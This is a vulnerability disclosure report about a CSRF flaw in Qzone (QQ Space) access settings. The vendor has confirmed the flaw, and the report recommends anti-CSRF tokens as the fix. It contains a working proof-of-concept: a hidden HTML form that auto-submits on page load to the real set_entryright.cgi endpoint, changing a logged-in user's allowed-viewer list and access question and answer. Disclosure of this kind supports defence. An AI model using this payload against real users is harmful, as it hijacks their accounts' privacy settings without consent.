Vulnerability Author: blue
Submission time:
Public time:
Vulnerability Type: CSRF
Hazard level: High
Vulnerability status: Confirmed by the vendor
Brief description:
When the target user is logged in to Qzone (QQ Space), they can be lured into opening a web page containing CSRF code that performs certain operations on their behalf, such as adding a visitor to the list of users allowed to view the space, changing the access password, and so on. The password-protected space setting is used as the example here.
Detailed description:
Before testing:
After the user is lured into visiting the page (the visitor has been added to the allowed list and the access password has been changed):
Proof of vulnerability:
CSRF form sample code:
<form action="http://w.qzone.qq.com/cgi-bin/right/set_entryright.cgi" method="post">
<input type="hidden" name="seq" value="335"/>
<input type="hidden" name="uinlist" value="***"/> <!-- list of QQ numbers allowed to view the space -->
<input type="hidden" name="entryq1" value="you know?"/> <!-- question 1 -->
<input type="hidden" name="entrya1" value="blue"/> <!-- answer 1 -->
<input type="hidden" name="bit" value="3"/>
<input type="hidden" name="flag" value="3"/>
<input type="hidden" name="uin" value="***"/> <!-- QQ number of the target user -->
</form>
<script type="text/javascript">
document.forms[0].submit(); // auto-submit the form as soon as the page loads
</script>
Solution:
Add a verification mechanism, such as an anti-CSRF token bound to the user's session that the settings page embeds in its form and the CGI checks on every change, or require the user to enter their password when changing these settings. The login cookie alone must not be enough to authorise the change, since the browser attaches it to any cross-site form submission automatically.
Vulnerability response
Vendor response:
Hazard level: Medium
Vulnerability Rank: 5
Confirmation time:
Vendor reply:
Thanks